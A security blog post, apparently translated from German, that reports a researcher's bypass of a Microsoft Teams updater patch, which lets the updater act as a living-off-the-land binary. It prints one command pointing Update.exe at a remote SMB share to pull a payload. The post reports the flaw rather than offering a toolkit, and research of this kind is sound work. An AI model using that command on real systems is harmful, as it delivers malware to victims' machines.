Attacker can abuse Microsoft Team Updater to install Malware

[German]The Updater from Microsoft teams can be misused by hackers as Living off the Land-Binary (LoLBin) to install malware remotely on the user's system. Microsoft's efforts to eliminate this vulnerability work to some degree, but ultimately cannot stop attackers from using teams to place and run their malware.


I came across this issue in over two places. Bleeping Computer has put it all together in this article. In addition, someone who found a vulnerability posted it on Twitter.

According to Bleeping Computer, a vulnerability in Microsoft teams had already been discovered and described a year ago. The update mechanism, as implemented in the Teams desktop application of Microsoft Teams at that time, allows the download and execution of any files on the system. Reegun Jayapaul, now Lead Threat Architect for SpiderLabs at Trustwave, had also found the issue in 2019 and published technical details. Microsoft then released a patch to fix the exploitability of this vulnerability.

Modied attack possible

Now security researcher Reegun Richard has discovered the vulnerability mentioned in the above tweet. The patch, which was previously made available to the teams, was intended to restrict the ability to update via a URL. However, the updater still allows local connections via a share or local folder for product updates. However, when the security researcher observed this finding, he discovered that the restrictions added by the patch could easily be circumvented by pointing to a remote SMB share. Here is a command:

Update.exe --update=\\remoteserver\payloadFolder

Reegun writes that the vulnerability allowed a malicious actor to use the MS Teams Updater to download any binary file or payload. This technique is commonly referred to as "Living Off the Land" and is particularly dangerous because it uses known, common software to download malware.


Details can be found in the two linked articles. In general, I am uneasy about Microsoft Teams from a security point of view, as you may read within my old blog post Microsoft Teams and it's security.

Similar articles:
Microsoft Teams and it's security 
Microsoft Teams: Vulnerability allowed account takeove
MS-Teams on Windows Server: Keep an eye on your RAM
Zoom & Teams not GDPR compliant useable
Does Windows 10 VPN Bug-Fix Update cause Teams issues?
Office 365: List of IPs and URLs updated with Teams

Cookies helps to fund this blog: Cookie settings

This entry was posted in Security and tagged , . Bookmark the permalink.

Leave a Reply

Your email address will not be published. Required fields are marked *